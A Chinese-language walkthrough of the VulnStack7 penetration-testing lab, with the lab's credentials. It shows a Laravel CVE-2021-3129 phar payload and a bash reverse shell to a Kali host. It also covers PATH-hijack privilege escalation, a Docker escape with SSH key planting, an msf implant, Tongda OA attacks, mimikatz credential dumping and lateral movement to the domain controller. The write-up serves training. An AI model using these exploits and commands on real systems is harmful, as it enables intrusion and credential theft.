红日靶场 VulnStack7
这是两段时间打的靶场了,所以前后IP不一样。
这样的网络配置
三层域网络在:192.68.93.0的c段
二层网络:有52的网段,也连通三层网络的93段
DMZ:处于192.68.52.0的c段 与kali连通,若是不连通 获取权限后也就是多做一层代理
只用到了 Vmnet1 和6 网卡
域用户账户和密码如下:
Administrator:Whoami2021
whoami:Whoami2021
bunny:Bunny2021
moretz:Moretz2021
Ubuntu 1:
web:web2021
Ubuntu 2:
ubuntu:ubuntu
通达OA账户:
admin:admin657260
第一层边界突破
Laravel RCE 写shell
通过访问 http://100.66.189.168:81/ 页面发现是Laravel框架 版本是8.29.0
通过搜索引擎找到此版本存在CVE-2021-3129漏洞
Laravel框架介绍
aravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)。它可以让你从面条一样杂乱的代码中解脱出来;它可以帮你构建一个完美的网络APP,而且每行代码都可以简洁、富于表达力。
漏洞描述如下:
当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。
影响版本 Laravel<=8.4.2
先使用CVE-2021-3129工具检测是否存在此反序列化漏洞
https://github.com/zhzyker/CVE-2021-3129
这些poc都需要借助phpggc工具脚本来生成,需要在linux下使用。
检测到多条pop都可以利用
漏洞利用过程
利用链子过程
1.生成poc
php -d "phar.readonly=0" ./phpggc Laravel/RCE5 "phpinfo();" --phar phar -o php://output | base64 -w 0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:] + '=00' for i in sys.stdin.read()]).upper())"
注意在最后加上一个a,不然会不可用
2.发送数据包,先清空日志
"viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"
3.给log增加一次前缀,用于对齐
"viewFile": "AA"
4.发送编码后的POC作为viewFile的值
"viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=66=00=41=00=67=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=44=00=49=00=41=00=51=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=55=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=51=00=6E=00=56=00=7A=00=58=00=45=00=52=00=70=00=63=00=33=00=42=00=68=00=64=00=47=00=4E=00=6F=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=59=00=36=00=49=00=67=00=41=00=71=00=41=00=48=00=46=00=31=00=5A=00=58=00=56=00=6C=00=55=00=6D=00=56=00=7A=00=62=00=32=00=78=00=32=00=5A=00=58=00=49=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=55=00=36=00=49=00=6B=00=31=00=76=00=59=00=32=00=74=00=6C=00=63=00=6E=00=6C=00=63=00=54=00=47=00=39=00=68=00=5A=00=47=00=56=00=79=00=58=00=45=00=56=00=32=00=59=00=57=00=78=00=4D=00=62=00=32=00=46=00=6B=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=41=00=36=00=65=00=33=00=31=00=70=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=30=00=4F=00=69=00=4A=00=73=00=62=00=32=00=46=00=6B=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=67=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=51=00=6E=00=4A=00=76=00=59=00=57=00=52=00=6A=00=59=00=58=00=4E=00=30=00=61=00=57=00=35=00=6E=00=58=00=45=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=45=00=56=00=32=00=5A=00=57=00=35=00=30=00=49=00=6A=00=6F=00=78=00=4F=00=6E=00=74=00=7A=00=4F=00=6A=00=45=00=77=00=4F=00=69=00=4A=00=6A=00=62=00=32=00=35=00=75=00=5A=00=57=00=4E=00=30=00=61=00=57=00=39=00=75=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=4D=00=79=00=4F=00=69=00=4A=00=4E=00=62=00=32=00=4E=00=72=00=5A=00=58=00=4A=00=35=00=58=00=45=00=64=00=6C=00=62=00=6D=00=56=00=79=00=59=00=58=00=52=00=76=00=63=00=6C=00=78=00=4E=00=62=00=32=00=4E=00=72=00=52=00=47=00=56=00=6D=00=61=00=57=00=35=00=70=00=64=00=47=00=6C=00=76=00=62=00=69=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6A=00=62=00=32=00=35=00=6D=00=61=00=57=00=63=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=55=00=36=00=49=00=6B=00=31=00=76=00=59=00=32=00=74=00=6C=00=63=00=6E=00=6C=00=63=00=52=00=32=00=56=00=75=00=5A=00=58=00=4A=00=68=00=64=00=47=00=39=00=79=00=58=00=45=00=31=00=76=00=59=00=32=00=74=00=44=00=62=00=32=00=35=00=6D=00=61=00=57=00=64=00=31=00=63=00=6D=00=46=00=30=00=61=00=57=00=39=00=75=00=49=00=6A=00=6F=00=78=00=4F=00=6E=00=74=00=7A=00=4F=00=6A=00=63=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=35=00=68=00=62=00=57=00=55=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=59=00=57=00=4A=00=6A=00=5A=00=47=00=56=00=6D=00=5A=00=79=00=49=00=37=00=66=00=58=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=32=00=39=00=6B=00=5A=00=53=00=49=00=37=00=63=00=7A=00=6F=00=79=00=4E=00=54=00=6F=00=69=00=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=63=00=47=00=68=00=77=00=61=00=57=00=35=00=6D=00=62=00=79=00=67=00=70=00=4F=00=79=00=42=00=6C=00=65=00=47=00=6C=00=30=00=4F=00=79=00=41=00=2F=00=50=00=69=00=49=00=37=00=66=00=58=00=31=00=39=00=42=00=51=00=41=00=41=00=41=00=47=00=52=00=31=00=62=00=57=00=31=00=35=00=42=00=41=00=41=00=41=00=41=00=50=00=31=00=52=00=63=00=6D=00=49=00=45=00=41=00=41=00=41=00=41=00=44=00=48=00=35=00=2F=00=32=00=4B=00=51=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=41=00=41=00=41=00=41=00=48=00=52=00=6C=00=63=00=33=00=51=00=75=00=64=00=48=00=68=00=30=00=42=00=41=00=41=00=41=00=41=00=50=00=31=00=52=00=63=00=6D=00=49=00=45=00=41=00=41=00=41=00=41=00=44=00=48=00=35=00=2F=00=32=00=4B=00=51=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=47=00=7A=00=6B=00=46=00=79=00=39=00=71=00=44=00=71=00=50=00=41=00=6D=00=79=00=66=00=78=00=42=00=68=00=63=00=6C=00=52=00=49=00=5A=00=4E=00=56=00=41=00=77=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a"
5.再次发包,清空对log中的干扰字符
"viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"
6.进行phar://反序列化 执行phpinfo,需要使用绝对路径
"viewFile":"phar:///var/www/storage/logs/laravel.log/test.txt"
但是我这里失败了,重新发包回去查看,这里报错无法打开流
原理不是很懂,还是使用写好的工具来直接写shell文件
这里使用这个exp来直接写入文件,看了下源码 步骤和前面基本一样,poc直接编码好放在函数里
https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP
检查成功写入
这里使用哥斯拉来连接结果发现死活连接不上,全部返回为空的信息。最后发现使用3.0以下的版本才能连接,于是去作者网站看到
https://github.com/BeichenDream/Godzilla/releases
想必这个对应木马的poc一定使用的是3.0版本以下提供的webshell
这里使用2.9版本成功连接
发现ifconfig ip add 这些执行都不行
简单的信息收集一下
使用 cat /proc/self/cgroup 命令查看
发现这个奇怪的系统果然是个docker
proc文件系统
proc文件系统是linux 中比较重要的的一个文件系统,在sysfs文件系统没有出现之前,它可以说是用户层获取内核层信息的唯一方式,它是一个一种特殊的、由软件创建的文件系统,proc内的文件并不是真正‘real' 文件,而是一种描述进程信息的伪 文件系统(process information pesudo-file sysrem), 被用来描述系统运行信息(比如系统内存,设备挂载,或者是硬件配置等).常常用来控制或者描述内核信息。先反弹一个shell到kali上
bash -c "bash -i >& /dev/tcp/192.168.52.128/7869 0>&1"
[
](https://blog.csdn.net/weixin_42730667/article/details/113871447)
这时想要进行docker逃逸,需要提高我们的权限,这个www-data用户权限很低
我们find寻找搜索具有SUID或4000权限的文件,这里发现了一个shell文件,很显眼
find / -perm -u=s -type f 2>/dev/null
进入到home/jobs目录下查看
shell文件能运行
然后利用环境变量劫持提权,这里应该是/bin/bash 多写了个斜杠
cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH # 将/tmp添加到环境变量中,并且先加载执行/tmp里的程序
cd /home/jobs
./shell
提权成功
docker特权模式逃逸+ssh写密钥连接
ubuntu web1 getshell
还是fdisk -l 查看一下挂载目录
然后mkdir 一个break目录
然后mount 挂在break目录上去
此时便可以带着break目录去逃逸使用了
写入定时任务执行wget msf的木马
尝试了多次后发现定时任务文件是写上去了,但是定时任务不执行。
还有一种办法是通过ssh写密钥
首先查看到逃逸主机的ubuntu目录下的 .ssh隐藏文件
生成ssh公钥
然后再.ssh目录下查看pub公钥
写入免密登录密钥,注意写入的格式echo后面空一格
然后ssh连接 成功免密登录
这里发现100.66.189.168主机还有一个网卡 IP为192.168.52.10
上线到msf
生成elf木马
msf开启监听
在ubuntu上下载运行
msf成功上线
查看看到52.10网段的ubuntu1 已经拿下了
真实情况下用proxychain代理出来用namp扫就好了,这里是nat通的就直接扫
可以看到30存在8080端口
第二层网络渗透
ew反向代理+burp两重代理
这个52本来是我VMnet6的nat网卡段,结果我物理机居然VMnet6 IP和这个不一致,这就造成了隔离
不过正好 就类比实际情况的内网隔离了,ok现在用ew反向代理出网,
本来kali通过ubuntu是可以的代理访问到52的,但是各种原因kali本身就在52段,然后这里就直接在win7上用ew代理
首先vps的两个端口要把防火墙打开
-l是我们去连接的,-e是受害机器连接
流量会从666转发到798
然后谷歌配置代理就能访问了
但是谷歌这个SwitchyOmega插件同时配置了socks5代理和burp本地代理就会出问题,所以还是用火狐。
首先配置浏览器两个代理
然后burp在options处设置socks5代理
然后就可以正常抓包了
win7 30getshell
任意用户登录
通达v11的oa,漏洞很多,随便网上找个rce这里直接是未授权获取登录session
然后抓包访问/general/ 页面添加上session
结果这个靶场的oa授权过期了,md登录上来就喊激活
未授权写文件
直接未授权写入图片马
然后到文件包含的地方执行命令
这里应该有回显才对,应该是系统没授权了 所以显示不了
正常到这就可以rce了的,那么我就直接上线到cs了
第三层域渗透
信息收集
对win7信息收集,发现了一个93新的网段
这里用20扫描出了 10、30、40这三台机器
收集域信息,这是在 dc.whoamianony.org的域
扫描30的主机信息,显然这很可能是DC
in 2012 R2 Datacenter 9600
扫描40的主机信息
Win 7 Professional 7601 SP 1
fscan扫描
内网扫描还是得fscan,用cs 直接upload传过去
fscan扫描结果
扫描整个93的c段
会在当前目录生成一个result.txt 可以查看
PTH横向攻击
ok接下来试着抓密码用ms15简单的提个权限
导出system.hive和sam.hive后导入到mimikatz 然后直接抓
这里获取到DC的密码和此win7 bunny的明文密码
net use网络映射连接域控
NTML也有可以进行pth攻击,但是有明文了可以直接用net use来连接了结果一直没连接上不知道为啥
最后发现是tmd命令后面多打了个斜杠 ,难受
net use \\DC.WHOAMIANONY.ORG\ipc$ "passwd" /user:"administrator"
直接远程桌面连接域控
结果在win7上可以直接用账号密码就连接上了域控,完成!
pth攻击域控
迁移父进程到弹出的cmd中
也可以直接在远程桌面win7上连接
浙公网安备 33010602011771号